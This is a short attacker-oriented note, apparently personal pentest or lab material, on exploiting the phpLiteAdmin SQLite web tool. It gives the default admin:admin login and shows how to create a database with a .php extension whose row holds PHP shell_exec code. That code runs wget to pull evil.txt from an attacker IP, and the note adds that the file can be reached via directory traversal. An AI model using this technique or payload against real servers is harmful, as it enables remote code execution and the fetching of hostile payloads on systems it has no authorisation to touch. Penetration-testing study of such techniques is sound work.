PHPLiteAdmin

Phpliteadmin is a web based sqlite database admin tool. Through this tool a user can add, delete or modify databases, tables and rows. The default login to the admin pages is admin:admin.

When you have access to the phpliteadmin pages, the easiest thing to do is to create a new database (by the extension .php so that the php server will execute the lines we include in the db) and table, and then add the commands that you want to execute on the target system.

The value can be as follows,

<?php
  
// Use ls command to shell_exec
// function
$output = shell_exec('wget http://192.168.119.223:443/evil.txt');
  
// Display the list of all file
// and directory
echo "<pre>$output</pre>";
?>

Now for this to work, you have to php installed (duh!) and you need to be able to access this database through the browser.

Which means you have to know the exact location of this file and if it is outside of the root directory of the web server, then it should be susceptible to Directory Traversal attack.